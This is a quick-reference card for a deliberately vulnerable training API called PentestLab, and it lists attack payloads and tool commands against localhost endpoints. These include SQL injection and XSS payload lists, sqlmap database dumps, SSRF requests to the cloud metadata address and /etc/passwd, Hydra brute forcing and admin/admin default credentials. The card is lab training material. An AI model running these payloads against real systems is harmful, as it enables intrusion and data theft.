# 🚀 PentestLab Enterprise - Quick Reference Card

**Print this card or keep it open for testing!**

---

## 🟴 CRITICAL VULNERABILITIES

### 1. SQL Injection (Boolean-Based)
```bash
# Postman
GET /api/injection/sqli/boolean?username=' OR '1'='1

# SQLMap
sqlmap -u "http://localhost:5000/api/injection/sqli/boolean?username=1" --dbs

# Expected: Returns multiple users (admin, user1, user2)
```

### 2. SQL Injection (Time-Based)
```bash
# Postman
GET /api/injection/sqli/time-based?id=1' AND SLEEP(5)--

# SQLMap
sqlmap -u "http://localhost:5000/api/injection/sqli/time-based?id=1" --technique=T

# Expected: Response delayed by 5+ seconds
```

### 3. XSS (Reflected)
```bash
# Browser
http://localhost:5000/api/xss/reflected?message=<img src=x onerror="alert('XSS')">

# Burp Intruder
Payload: <img src=x onerror=alert(1)>
Expected: JavaScript alert popup

# FFUF
ffuf -u "http://localhost:5000/api/xss/reflected?message=FUZZ" -w xss.txt
```

### 4. IDOR (Insecure Direct Object Reference)
```bash
# Postman
GET /api/access/idor/1    # Admin user
GET /api/access/idor/2    # User data
GET /api/access/idor/3    # Another user

# FFUF Enumeration
ffuf -u "http://localhost:5000/api/access/idor/FUZZ" -w numbers.txt

# Expected: Access to any user's data (SSN, salary included!)
```

---

## 🟠 HIGH SEVERITY

### 5. Exposed Configuration
```bash
# Postman
GET /api/config/exposed

# Expected: Database password, API keys, JWT secret exposed
# Extract: Database credentials from response
```

### 6. SSRF (Server-Side Request Forgery)
```bash
# Postman
POST /api/ssrf/fetch
Body: {"url": "http://169.254.169.254/latest/meta-data/"}

# Test Internal Services
{"url": "http://localhost:6379"}  # Redis
{"url": "http://localhost:8080"}  # Internal API
{"url": "file:///etc/passwd"}     # Local files
```

### 7. Default Credentials
```bash
# Postman
POST /api/auth/login
Body: {"username": "admin", "password": "admin"}

# Expected: Valid JWT token
```

### 8. Brute Force (No Rate Limiting)
```bash
# Postman (Send 100 times)
POST /api/auth/brute-force
Body: {"username": "admin", "password": "attempt123"}

# Expected: All attempts succeed instantly

# Hydra
hydra -l admin -P passwords.txt http://localhost:5000/api/auth/brute-force
```

---

## 🟡 MEDIUM SEVERITY

### 9. Weak Password Policy
```bash
# Postman
POST /api/auth/weak-password
Body: {"username": "test", "password": "1"}

# Expected: Even 1-character passwords accepted!
```

### 10. Race Condition
```bash
# Send 10 identical requests simultaneously
POST /api/business/race-condition
Body: {"transaction_id": "TXN-12345", "amount": 1000}

# Expected: Same transaction processes multiple times
```

### 11. Business Logic Flaw
```bash
# Postman
POST /api/business/negative-amount
Body: {"amount": -1000}

# Expected: Negative amount treated as deposit instead of withdrawal
```

---

## 🔵 QUICK ENDPOINT MAP

| Vulnerability | Endpoint | Method | Test |
|---------------|----------|--------|------|
| SQLi Boolean | `/api/injection/sqli/boolean?username=' OR '1'='1` | GET | Multiple users |
| SQLi Time | `/api/injection/sqli/time-based?id=1' AND SLEEP(5)--` | GET | 5s delay |
| XSS Reflected | `/api/xss/reflected?message=<img src=x onerror=alert(1)>` | GET | Popup |
| XSS Stored | `/api/xss/stored` | POST/GET | Store & retrieve |
| IDOR | `/api/access/idor/2` | GET | Access other users |
| Config | `/api/config/exposed` | GET | Database password |
| Auth | `/api/auth/login` | POST | admin/admin |
| Weak Pass | `/api/auth/weak-password` | POST | password="1" |
| SSRF | `/api/ssrf/fetch` | POST | {"url": "..."} |
| Redirect | `/api/redirect/open?url=attacker.com` | GET | Redirect |
| Health | `/api/health` | GET | Status check |

---

## 🛠️ TOOL QUICK COMMANDS

### Postman
```
1. Import: PENTESTLAB_POSTMAN_COLLECTION.json
2. Set: base_url = http://localhost:5000
3. Click "Send" on any request
4. View: Response panel for results
```

### SQLMap
```bash
# List databases
sqlmap -u "http://localhost:5000/api/injection/sqli/boolean?username=1" \
  --dbs --batch

# Dump table
sqlmap -u "http://localhost:5000/api/injection/sqli/boolean?username=1" \
  -D pentestlab -T user --dump --batch

# UNION-based
sqlmap -u "http://localhost:5000/api/injection/sqli/union?search=1" \
  --technique=U -D pentestlab -T user --columns
```

### Burp Suite
```
1. Add target: http://localhost:5000
2. Proxy traffic through Burp
3. Use Scanner for auto-discovery
4. Use Intruder for fuzzing
5. Check Results tab for findings
```

### OWASP ZAP
```bash
# Start daemon
zaproxy -daemon -port 8090 -config api.disablekey=true

# Spider scan
curl "http://localhost:8090/JSON/spider/action/scan?url=http://localhost:5000"

# Active scan
curl "http://localhost:8090/JSON/ascan/action/scan?url=http://localhost:5000"
```

### FFUF
```bash
# Endpoint fuzzing
ffuf -u "http://localhost:5000/api/FUZZ" -w endpoints.txt

# IDOR enumeration
ffuf -u "http://localhost:5000/api/access/idor/FUZZ" -w numbers.txt

# SQLi fuzzing
ffuf -u "http://localhost:5000/api/injection/sqli/boolean?username=FUZZ" \
  -w sqli.txt -fr "\"count\": 1" -mr "\"count\": [2-9]"
```

---

## 📋 INVESTIGATION CHECKLIST

For each vulnerability:
- [ ] Found the endpoint
- [ ] Tested with 2+ payload variations
- [ ] Triggered the vulnerability
- [ ] Extracted sensitive data
- [ ] Documented the finding
- [ ] Found root cause in code
- [ ] Wrote secure version
- [ ] Tested the fix
- [ ] Assessed business impact

---

## 🎯 PAYLOADS BY VULNERABILITY

### SQL Injection Payloads
```
' OR '1'='1
' OR 1=1--
admin'--
' UNION SELECT NULL--
' AND SLEEP(5)--
* OR *=*
' OR 'x'='x
1' OR '1=1
```

### XSS Payloads
```
<img src=x onerror=alert(1)>
<script>alert(1)</script>
<svg onload=alert(1)>
"><script>alert(1)</script>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
```

### IDOR Test IDs
```
1 (Admin)
2 (User 1)
3 (User 2)
10, 100, 999, 9999 (Enumeration)
```

---

## 🔧 TROUBLESHOOTING

**Port 5000 already in use?**
```bash
# Find process
lsof -i :5000

# Kill it
kill -9 <PID>

# Change Flask port
python pentestlab_api.py --port=8000
```

**Import Failed in Postman?**
- Check: File path is correct
- File: PENTESTLAB_POSTMAN_COLLECTION.json
- In: Same directory

**SQLMap Not Finding Issues?**
```bash
# Increase verbosity
sqlmap -u "..." -v 3

# Use higher risk
sqlmap -u "..." --level=5 --risk=3

# Manual payload
sqlmap -u "..." --technique=B -p username
```

**FFUF Not Matching?**
```bash
# Show all responses
ffuf -u "..." -w words.txt -v

# Check response size
ffuf -u "..." -w words.txt -fs 100  # Hide 100-byte responses
```

---

## 📚 FILE REFERENCE

| File | Purpose | Time to Read |
|------|---------|--------------|
| README.md | Overview & setup | 10 min |
| TESTING_GUIDE.md | Detailed exploitation | 30 min |
| POSTMAN_COLLECTION.json | Ready-to-use tests | 5 min setup |
| SESSION_SUMMARY.md | What's been built | 5 min |
| VULNERABILITIES.json | All 52 vulns | Reference |

---

## ⏱️ TYPICAL TESTING TIMELINE

```
5 min   - Start API
5 min   - Import Postman
10 min  - Test SQL Injection
10 min  - Test XSS
10 min  - Test IDOR
10 min  - Use SQLMap
10 min  - Use Burp/ZAP
20 min  - Document findings
━━━━━━━━
80 min  - Full assessment
```

---

## 🎓 LEARNING PATH

**Start Here (30 minutes):**
1. SQL Injection (Boolean-based)
2. Reflected XSS
3. IDOR Enumeration

**Then (1 hour):**
4. Time-based SQLi
5. Stored XSS
6. Exposed Configuration

**Advanced (2+ hours):**
7. SSRF exploitation
8. Race conditions
9. Business logic bypass

---

## 🚨 REMEMBER

- ✅ Only test on systems you own or have permission
- ✅ Document every finding
- ✅ Report vulnerabilities responsibly
- ❌ Don't attack unauthorized systems
- ❌ Don't deploy vulnerabilities to production
- ❌ Don't share credentials

---

## 📞 HELP

**API won't start?**
→ Check PENTESTLAB_README.md - Troubleshooting section

**Don't know how to test?**
→ Read PENTESTLAB_TESTING_GUIDE.md (45KB comprehensive guide)

**Need Postman help?**
→ See POSTMAN_COLLECTION.json - All requests documented

**Want to learn?**
→ Check SESSION_SUMMARY.md - Learning paths included

---

## 🔗 USEFUL URLS

```
Dashboard:    http://localhost:5000
Health:       http://localhost:5000/api/health
Vulns List:   http://localhost:5000/api/vulnerabilities/list
Test Guide:   http://localhost:5000/api/testing-guide?vuln_id=WEB-2021-A01
```

---

**Print this card!** Keep it visible while testing.

**PentestLab Enterprise v2.0** - Professional Security Training
